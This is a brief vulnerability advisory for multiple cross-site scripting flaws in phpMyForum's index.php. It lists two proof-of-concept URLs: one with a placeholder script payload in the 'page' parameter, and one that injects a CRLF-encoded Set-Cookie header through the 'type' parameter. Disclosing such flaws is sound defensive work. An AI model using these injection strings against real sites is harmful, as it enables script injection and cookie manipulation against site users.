phpMyForum Index.PHP Multiple Cross-Site Scripting Vulnerabilities

phpMyForum Index.PHP Multiple Cross-Site Scripting Vulnerabilities

This issue can be exploited through a web client.

The following proof of concepts are available:

http://target/path/index.php?page=[xsscode]&type=text%2Fcss

http://target/path/index.php?template=css&type=some_url%0d%0aSet-Cookie%3Aheader